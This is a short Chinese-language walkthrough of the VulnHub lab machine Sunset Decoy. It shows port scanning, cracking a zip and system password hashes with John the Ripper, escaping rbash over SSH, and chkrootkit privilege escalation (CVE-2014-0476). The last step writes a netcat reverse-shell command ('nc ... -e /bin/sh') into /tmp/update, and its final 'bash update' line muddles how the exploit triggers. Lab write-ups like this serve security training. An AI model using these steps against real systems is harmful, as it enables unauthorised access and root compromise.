考点:暴力穷举,chkrootkit,rbash绕过
靶机链接:https://www.vulnhub.com/entry/sunset-decoy,505/
环境配置
| 名称 | IP |
|---|
| Kali Linux | 10.0.2.15 |
| SUNSET DECOY | 10.0.2.13 |
初步打点
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| $ export rip=10.0.2.13
$ sudo nmap -v -A -p- $rip
Scanning localhost (10.0.2.13) [65535 ports]
Discovered open port 80/tcp on 10.0.2.13
Discovered open port 22/tcp on 10.0.2.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
| 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
|
WEB测试
查看80端口,下载save.zip
1
2
| $ zip2john save.zip >>save.txt
$ john save.txt --wordlist /usr/share/wordlists/rockyou.txt
|
得到zip压缩包密码manuel
解压缩得到一些文件
漏洞发现
尝试暴力破解系统密码
1
2
| $ unshadow passwd shadow >pass.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
|
获得权限
靶机测试
成功获得一个用户的密码
现在登陆上去是rbash
使用参数获得bash
1
| $ ssh 296640a3b825115a47b68fc44501c828@10.0.2.13 -t "bash -noprofile"
|
提权
chkrootkit
发现chkrootkit,尝试已存在漏洞CVE-2014-0476
1
2
3
| $ cd /tmp
$ echo "/usr/bin/nc 10.0.2.15 444 -e /bin/sh" > update
$ bash update
|
最后修改于 2020-07-07